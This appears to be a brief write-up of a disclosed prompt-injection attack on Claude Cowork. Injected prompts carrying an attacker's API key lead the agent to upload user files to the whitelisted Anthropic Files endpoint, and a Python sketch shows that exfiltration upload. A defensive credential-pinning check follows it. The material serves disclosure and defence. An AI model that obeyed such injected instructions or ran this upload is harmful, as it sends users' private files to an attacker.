Overview
Researchers discovered a clever attack that bypasses Claude Cowork’s security protections by exploiting its trusted domain whitelist to exfiltrate user files. The attack uses the victim’s own AI agent to upload sensitive files to an attacker-controlled Anthropic account.
Key Facts
- Claude Cowork restricts outbound HTTP traffic to specific domains - attackers found a way around this fundamental security control
- Anthropic’s API domain is whitelisted for legitimate operations - this trusted status becomes the attack vector
- The attack embeds the attacker's own Anthropic API key in injected prompts - turns the victim's AI agent into an unwitting accomplice
- Files get uploaded to the https://api.anthropic.com/v1/files endpoint - sensitive data ends up in the attacker's Anthropic account for later retrieval (see the request sketch after this list)
- Discovered by PromptArmor security researchers - demonstrates how AI agent security assumptions can be weaponized
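To make the mechanics concrete, the minimal Python sketch below shows roughly what the injected instructions amount to: an ordinary multipart upload to the whitelisted Files endpoint, authenticated with the attacker's key instead of the victim's. The header names and the files-api beta flag follow Anthropic's public Files API documentation; the key value and file path are placeholders, not details from the report.

```python
import requests

# Illustrative placeholders - not values from the actual disclosure.
ATTACKER_API_KEY = "sk-ant-...attacker-controlled-key..."
TARGET_FILE = "/home/victim/notes/credentials.txt"

with open(TARGET_FILE, "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",  # whitelisted domain, so egress filtering lets it through
        headers={
            "x-api-key": ATTACKER_API_KEY,             # authenticates as the attacker's account
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # Files API beta header per public docs (assumption)
        },
        files={"file": ("credentials.txt", f)},        # standard multipart file upload
    )

# A 2xx response means the file now sits in the attacker's Anthropic account,
# retrievable later with the same key.
print(resp.status_code, resp.text)
```

The point of the sketch is that nothing in the request looks anomalous to a domain-based filter: the destination is the trusted API, and only the credential reveals whose account the data lands in.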
Why It Matters
This exposes a fundamental gap in AI agent security design - a domain whitelist controls where traffic may go, but not whose account receives the data. Because anyone can obtain legitimate API access to the trusted domain, an attacker-supplied credential turns the whitelisted endpoint into an exfiltration channel.
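One rough way to see the needed mitigation: egress policy has to pin the credential as well as the domain. The sketch below is a hypothetical policy check for an egress proxy, not anything Anthropic ships; names such as ALLOWED_DOMAINS and USER_API_KEY are purely illustrative.

```python
from urllib.parse import urlparse

# Hypothetical egress-proxy policy: allowlist the domain AND the credential.
ALLOWED_DOMAINS = {"api.anthropic.com"}
USER_API_KEY = "sk-ant-...the-workspace-owner's-own-key..."

def is_request_allowed(url: str, headers: dict) -> bool:
    """Allow a request only if it targets an allowlisted domain and
    authenticates with the workspace's own key, so data cannot land in
    someone else's account on the same trusted domain."""
    host = urlparse(url).hostname or ""
    if host not in ALLOWED_DOMAINS:
        return False
    return headers.get("x-api-key", "").strip() == USER_API_KEY

# A request smuggling an attacker-owned key is rejected even though the
# destination domain is whitelisted.
assert not is_request_allowed(
    "https://api.anthropic.com/v1/files",
    {"x-api-key": "sk-ant-...attacker-controlled-key..."},
)
```

Credential pinning is only one option - stripping untrusted content from prompts or requiring user confirmation before uploads would address the same gap from other directions.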